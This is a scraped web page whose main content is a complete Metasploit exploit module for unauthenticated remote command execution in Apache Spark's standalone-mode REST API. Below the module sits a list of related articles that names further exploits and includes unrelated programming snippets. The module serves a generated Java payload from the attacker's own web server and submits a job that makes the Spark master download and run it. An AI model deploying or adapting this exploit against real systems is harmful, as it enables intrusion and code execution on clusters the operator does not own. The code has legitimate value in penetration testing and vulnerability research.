##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})

    super(update_info(info,

      'Name'           => 'Apache Spark Unauthenticated Command Execution',

      'Description'    => %q{

          This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API.

          It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.

      },

      'License'        => MSF_LICENSE,

      'Author'         =>

        [

          'aRe00t',                            # Proof of concept

          'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module

        ],

      'References'     =>

        [

          ['URL', 'https://www.jianshu.com/p/a080cb323832'],

          ['URL', 'https://github.com/vulhub/vulhub/tree/master/spark/unacc']

        ],

      'Platform'       => 'java',

      'Arch'           => [ARCH_JAVA],

      'Targets'        =>

        [

          ['Automatic', {}]

        ],

      'Privileged'     => false,

      'DisclosureDate' => 'Dec 12 2017',

      'DefaultTarget'  => 0,

      'Notes'          =>

        {

          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],

          'Stability'   => [ CRASH_SAFE ],

          'Reliability' => [ REPEATABLE_SESSION]

        }

    ))

    register_options [

      Opt::RPORT(6066),

      OptInt.new('HTTPDELAY', [true, 'Number of seconds the web server will wait before termination', 10])

    ]

  end

  def check

    return CheckCode::Detected if get_version

    CheckCode::Unknown

  end

  def primer

    path = service.resources.keys[0]

    binding_ip = srvhost_addr

    proto = datastore['SSL'] ? 'https' : 'http'

    payload_uri = "#{proto}://#{binding_ip}:#{datastore['SRVPORT']}/#{path}"

    send_payload(payload_uri)

  end

  def exploit

    fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version

    vprint_status("Generating payload ...")

    @pl = generate_payload.encoded_jar(random:true)

    print_error("Failed to generate the payload.") unless @pl

    print_status("Starting up our web service ...")

    Timeout.timeout(datastore['HTTPDELAY']) { super }

  rescue Timeout::Error

  end

  def get_version

    @version = nil

    res = send_request_cgi(

      'uri'           => normalize_uri(target_uri.path),

      'method'        => 'GET'

    )

    unless res

      vprint_bad("#{peer} - No response. ")

      return false

    end

    if res.code == 401

      print_bad("#{peer} - Authentication required.")

      return false

    end

    unless res.code == 400

      return false

    end

    res_json = res.get_json_document

    @version = res_json['serverSparkVersion']

    if @version.nil?

      vprint_bad("#{peer} - Cannot parse the response, seems like it's not Spark REST API.")

      return false

    end

    true

  end

  def send_payload(payload_uri)

    rand_appname   = Rex::Text.rand_text_alpha_lower(8..16)

    data =

    {

      "action"                    => "CreateSubmissionRequest",

      "clientSparkVersion"        => @version.to_s,

      "appArgs"                   => [],

      "appResource"               => payload_uri.to_s,

      "environmentVariables"      => {"SPARK_ENV_LOADED" => ""},

      "mainClass"                 => "#{@pl.substitutions["metasploit"]}.Payload",

      "sparkProperties"           =>

      {

        "spark.jars"              => payload_uri.to_s,

        "spark.driver.supervise"  => "false",

        "spark.app.name"          => rand_appname.to_s,

        "spark.eventLog.enabled"  => "true",

        "spark.submit.deployMode" => "cluster",

        "spark.master"            => "spark://#{rhost}:#{rport}"

      }

    }

    res = send_request_cgi(

      'uri'           => normalize_uri(target_uri.path, "/v1/submissions/create"),

      'method'        => 'POST',

      'ctype'         => 'application/json;charset=UTF-8',

      'data'          => data.to_json

    )

  end

  # Handle incoming requests

  def on_request_uri(cli, request)

    print_status("#{rhost}:#{rport} - Sending the payload to the server...")

    send_response(cli, @pl)

  end

end

[EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)的更多相关文章

  1. [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. [EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  3. [EXP]Huawei Router HG532e - Command Execution

    #!/bin/python ''' Author : Rebellion Github : @rebe11ion Twitter : @rebellion ''' import urllib2,req ...

  4. [EXP]Apache Tika-server < 1.18 - Command Injection

    #################################################################################################### ...

  5. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  6. struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  7. Why Apache Spark is a Crossover Hit for Data Scientists [FWD]

    Spark is a compelling multi-purpose platform for use cases that span investigative, as well as opera ...

  8. Apache Spark源码走读之13 -- hiveql on spark实现详解

    欢迎转载,转载请注明出处,徽沪一郎 概要 在新近发布的spark 1.0中新加了sql的模块,更为引人注意的是对hive中的hiveql也提供了良好的支持,作为一个源码分析控,了解一下spark是如何 ...

  9. Apache Spark 2.2.0 中文文档

    Apache Spark 2.2.0 中文文档 - 快速入门 | ApacheCN Geekhoo 关注 2017.09.20 13:55* 字数 2062 阅读 13评论 0喜欢 1 快速入门 使用 ...

随机推荐

  1. python 读取excel数据

    import xlrd book = xlrd.open_workbook(file_path)#打开文件 sheet = book.sheet_by_index(0) #获取第一个工作簿 print ...

  2. mysql数据库导入与导出

    导出 导出数据和表结构: mysqldump -u用户名 -p 数据库名 > 数据库名.sql mysqldump -uroot -p dbname > dbname .sql      ...

  3. java项目中VO和DTO以及Entity,各自是在什么情况下应用

    1.entity里的每一个字段,与数据库相对应, 2.dto里的每一个字段,是和你前台页面相对应, 3.VO,这是用来转换从entity到dto,或者从dto到entity的中间的东西.   举个例子 ...

  4. (转)Android四大组件——Activity跳转动画、淡出淡入、滑出滑入、自定义退出进入

    文章转自:http://blog.csdn.net/qq_30379689/article/details/52494270 Activity跳转动画.淡入淡出.滑入滑出.自定义退出进入 前言: 系统 ...

  5. sql中with as测试实例

    一.使用场景 1.多处使用才有必要2.一方面减少代码数量便于理解维护3.一方面跟代码一样一次计算到处用 二.实例(本处示例仅为测试,实际用join比较好) 1.不使用with as 2.使用with ...

  6. BZOJ4377 Kurs szybkiego czytania \ Luogu 3589[POI2015]KUR - 数学思维题

    Solution 我又双叒叕去看题解啦$QAQ$, 真的想不到鸭 输入 $a$ 和 $n$ 互质, 所以满足 $a \times i \ mod \ n$ $(0<=i<n)$ 肯定是不重 ...

  7. Android工具

    2018-09-27 安卓签名工具 AndroidKiller 比如包打好了,想替换一个图片,就用zip打开,替换图片,重新签名.

  8. CentOS查找目录或文件

    查找目录:find /(查找范围) -name '查找关键字' -type d查找文件:find /(查找范围) -name 查找关键字 -print 如果需要更进一步的了解,可以参看Linux的命令 ...

  9. springsecurity 源码解读之 SecurityContext

    在springsecurity 中,我们一般可以通过代码: SecurityContext securityContext = SecurityContextHolder.getContext(); ...

  10. sql 百万级或千万级数据分页处理

    笔记来源 https://blog.csdn.net/zhenyuanjie/article/details/7778102